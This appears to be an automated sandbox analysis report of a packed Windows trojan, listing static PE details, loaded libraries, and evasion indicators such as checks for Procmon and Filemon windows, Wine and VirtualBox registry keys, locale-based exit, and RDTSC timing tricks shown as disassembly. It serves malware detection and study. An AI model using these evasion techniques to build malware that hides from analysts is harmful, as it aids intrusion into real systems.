              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067122C0_2_0067122C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007412C10_2_007412C1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00746ABE0_2_00746ABE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073C2A50_2_0073C2A5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00698B730_2_00698B73
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007453D30_2_007453D3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074CCFC0_2_0074CCFC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A449A0_2_006A449A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00742D280_2_00742D28
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073DDE40_2_0073DDE4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00750DB00_2_00750DB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074E7850_2_0074E785
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00394A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: cwdxftgy ZLIB complexity 0.994878748673036
              Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_003B3A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ACAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_003ACAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\YZMAG00M.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeReversingLabs: Detection: 44%
              Source: file.exeVirustotal: Detection: 51%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1794048 > 1048576
              Source: file.exeStatic PE information: Raw size of cwdxftgy is bigger than: 0x100000 < 0x19c200

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.390000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cwdxftgy:EW;bjyaubdj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cwdxftgy:EW;bjyaubdj:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003B6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b66aa should be: 0x1bdeac
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: cwdxftgy
              Source: file.exeStatic PE information: section name: bjyaubdj
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BB837 push 3E389125h; mov dword ptr [esp], edx0_2_007BB856
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BB837 push edx; mov dword ptr [esp], 3F0414B3h0_2_007BB8A2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D0028 push ecx; mov dword ptr [esp], ebp0_2_007D0097
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push 0903CC1Dh; mov dword ptr [esp], esi0_2_007498DA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push edx; mov dword ptr [esp], eax0_2_007498ED
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push ecx; mov dword ptr [esp], eax0_2_00749934
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push ebx; mov dword ptr [esp], eax0_2_007499EA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push ebx; mov dword ptr [esp], 77A79757h0_2_007499EE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push eax; mov dword ptr [esp], edi0_2_00749A20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push ecx; mov dword ptr [esp], eax0_2_00749A66
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push esi; mov dword ptr [esp], ebx0_2_00749B86
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push ebx; mov dword ptr [esp], 6F7D62CAh0_2_00749B8A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push edx; mov dword ptr [esp], ebp0_2_00749BB1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push 7CF33B72h; mov dword ptr [esp], ebp0_2_00749C8D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push edx; mov dword ptr [esp], 5C788DAFh0_2_00749CA9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push edx; mov dword ptr [esp], ecx0_2_00749CFE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push 5F0F01CDh; mov dword ptr [esp], edi0_2_00749D11
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push ecx; mov dword ptr [esp], 564F1A00h0_2_00749D7B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push edx; mov dword ptr [esp], ecx0_2_00749D94
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push edx; mov dword ptr [esp], ebp0_2_00749E38
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push 2277C68Ah; mov dword ptr [esp], eax0_2_00749EB6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push edx; mov dword ptr [esp], esi0_2_00749EF4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push edx; mov dword ptr [esp], edi0_2_00749FAC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push 5D196034h; mov dword ptr [esp], esi0_2_00749FE6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push ebp; mov dword ptr [esp], edx0_2_00749FEF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push 00F6107Dh; mov dword ptr [esp], edx0_2_0074A021
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push 4A85BFBCh; mov dword ptr [esp], edi0_2_0074A0C9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push 5C07BFB3h; mov dword ptr [esp], ecx0_2_0074A0E9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push eax; mov dword ptr [esp], ecx0_2_0074A18F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push ecx; mov dword ptr [esp], ebx0_2_0074A216
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push ecx; mov dword ptr [esp], 3B13200Eh0_2_0074A21A
              Source: file.exeStatic PE information: section name: cwdxftgy entropy: 7.954401218621547

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003B6390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26365
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFB84 second address: 5DFB88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754569 second address: 754579 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4F3CC87F76h 0x00000008 jnl 00007F4F3CC87F76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754579 second address: 75457F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75457F second address: 754583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754583 second address: 754592 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F4F3C50B5D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7546EB second address: 7546FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4F3CC87F7Ch 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7546FD second address: 754701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75484D second address: 754851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754851 second address: 754857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7549DA second address: 754A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F4F3CC87F88h 0x0000000b jmp 00007F4F3CC87F7Ch 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 pushad 0x00000014 je 00007F4F3CC87F76h 0x0000001a pushad 0x0000001b popad 0x0000001c jns 00007F4F3CC87F76h 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754B59 second address: 754B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754B5E second address: 754B77 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4F3CC87F7Ch 0x00000008 je 00007F4F3CC87F76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754B77 second address: 754B81 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4F3C50B5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757C27 second address: 757C93 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F4F3CC87F78h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov si, dx 0x00000024 mov ecx, dword ptr [ebp+122D3A21h] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F4F3CC87F78h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 jp 00007F4F3CC87F7Ch 0x0000004c push 72F2075Bh 0x00000051 push eax 0x00000052 push edx 0x00000053 jg 00007F4F3CC87F7Ch 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757C93 second address: 757D29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F4F3C50B5D6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 72F207DBh 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F4F3C50B5D8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d movzx ecx, cx 0x00000030 push 00000003h 0x00000032 mov edx, dword ptr [ebp+122D38B5h] 0x00000038 push 00000000h 0x0000003a mov cx, 255Eh 0x0000003e push 00000003h 0x00000040 mov cx, 2CA4h 0x00000044 sub edi, dword ptr [ebp+122D268Fh] 0x0000004a call 00007F4F3C50B5D9h 0x0000004f jo 00007F4F3C50B5DCh 0x00000055 pushad 0x00000056 push ecx 0x00000057 pop ecx 0x00000058 pushad 0x00000059 popad 0x0000005a popad 0x0000005b push eax 0x0000005c jng 00007F4F3C50B5EEh 0x00000062 mov eax, dword ptr [esp+04h] 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F4F3C50B5DEh 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757D29 second address: 757DCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F4F3CC87F8Ch 0x0000000f jmp 00007F4F3CC87F86h 0x00000014 popad 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 pushad 0x00000019 jnc 00007F4F3CC87F76h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 jmp 00007F4F3CC87F82h 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c jmp 00007F4F3CC87F7Eh 0x00000031 pop eax 0x00000032 mov di, bx 0x00000035 lea ebx, dword ptr [ebp+1244B98Ch] 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007F4F3CC87F78h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 0000001Dh 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 mov si, F56Ah 0x00000059 push eax 0x0000005a pushad 0x0000005b jmp 00007F4F3CC87F7Ch 0x00000060 push eax 0x00000061 push edx 0x00000062 push edi 0x00000063 pop edi 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757E0E second address: 757E7E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4F3C50B5D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D300Eh], esi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F4F3C50B5D8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D2963h], ecx 0x00000037 mov edi, dword ptr [ebp+122D3899h] 0x0000003d call 00007F4F3C50B5D9h 0x00000042 jo 00007F4F3C50B5E5h 0x00000048 jmp 00007F4F3C50B5DFh 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 jnp 00007F4F3C50B5D6h 0x00000057 jnc 00007F4F3C50B5D6h 0x0000005d popad 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757E7E second address: 757E9C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4F3CC87F7Ch 0x00000008 je 00007F4F3CC87F76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007F4F3CC87F78h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757E9C second address: 757EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jng 00007F4F3C50B5DAh 0x00000010 push ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757EB9 second address: 757EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A62D second address: 76A631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776FBD second address: 776FDD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4F3CC87F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F4F3CC87F86h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776FDD second address: 776FE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776FE3 second address: 776FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776FE7 second address: 777007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5DDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4F3C50B5DBh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777007 second address: 77701A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F4F3CC87F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77701A second address: 777024 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4F3C50B5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777024 second address: 77704D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F4F3CC87F7Ah 0x0000000c jmp 00007F4F3CC87F82h 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77704D second address: 77705A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F4F3C50B5D6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7771A9 second address: 7771C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777335 second address: 777339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777339 second address: 77733F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77733F second address: 777345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777345 second address: 77734A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777490 second address: 777496 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77775F second address: 777763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7778CC second address: 777923 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F4F3C50B5D6h 0x00000011 jnp 00007F4F3C50B5D6h 0x00000017 popad 0x00000018 pushad 0x00000019 jno 00007F4F3C50B5D6h 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F4F3C50B5E6h 0x00000026 popad 0x00000027 popad 0x00000028 pushad 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c jnc 00007F4F3C50B5D6h 0x00000032 jnp 00007F4F3C50B5D6h 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b pushad 0x0000003c jc 00007F4F3C50B5D6h 0x00000042 push ecx 0x00000043 pop ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777D8A second address: 777DA7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4F3CC87F84h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76DD93 second address: 76DD99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76DD31 second address: 76DD93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F4F3CC87F7Dh 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F4F3CC87F7Ah 0x0000001b jns 00007F4F3CC87F76h 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push edi 0x00000026 pop edi 0x00000027 jmp 00007F4F3CC87F81h 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f jc 00007F4F3CC87F76h 0x00000035 jnp 00007F4F3CC87F76h 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 778FE5 second address: 778FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 778FE9 second address: 779005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F88h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779005 second address: 77901A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4F3C50B5DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77901A second address: 779020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
